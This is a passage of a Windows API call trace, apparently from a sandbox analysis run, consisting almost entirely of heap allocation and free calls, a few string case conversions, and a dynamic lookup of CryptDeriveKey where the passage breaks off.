0x24ac978 [0256.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0256.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0256.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0256.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0256.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0256.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0256.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0256.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0256.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0256.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0256.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0256.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0256.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0256.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0256.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0256.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0256.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0256.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0256.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0256.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0256.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0256.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0256.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0256.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0256.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0256.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0256.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0256.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0256.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0256.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0256.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0256.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0256.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0256.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0256.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0256.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0256.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0256.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0256.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0256.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0256.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0256.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0256.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0256.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0256.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0256.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0256.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0256.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0256.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0256.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0256.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0256.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0256.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0256.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0256.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0256.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0256.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0256.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0256.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0256.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0256.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0256.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0256.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0256.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0256.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0256.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0256.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0256.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0256.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0256.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0256.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0256.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0256.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0256.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0256.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0256.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0256.277] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0256.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0256.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0256.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0256.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0256.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0256.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0256.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0256.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0256.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0256.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0256.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0256.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0256.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0256.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0256.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0256.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0256.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0256.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0256.278] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0256.278] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0256.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0256.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0256.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0256.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0256.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0256.279] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0256.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0256.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0256.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa080 [0256.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0256.279] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0256.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0256.279] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0256.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0256.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0256.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0256.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0256.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0256.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0256.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0256.280] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0256.280] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0256.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0256.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0256.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0256.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0256.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0256.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0256.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0256.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0256.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0256.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0256.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0256.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0256.281] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0256.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0256.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0256.281] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0256.281] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0256.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0256.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0256.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0256.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0256.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0256.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0256.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0256.281] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0256.281] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0256.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0256.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0256.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0256.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0256.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0256.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0256.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0256.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0256.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0256.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0256.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0256.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0256.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0256.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0256.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0256.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0256.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0256.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0256.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0256.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0256.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0256.283] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0256.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0256.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0256.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0256.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0256.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0256.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0256.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0256.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0256.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0256.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0256.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0256.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0256.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0256.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0256.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0256.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0256.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0256.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0256.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0256.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0256.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0256.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0256.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0256.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0256.284] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0256.284] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x24aa8c0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0256.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0256.285] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDeriveKey") returned 0x74d83188 [0256.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0256.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0256.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0256.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0256.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0256.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0256.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0256.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0256.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0256.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0256.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0256.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0256.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0256.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0256.286] CryptDeriveKey (in: 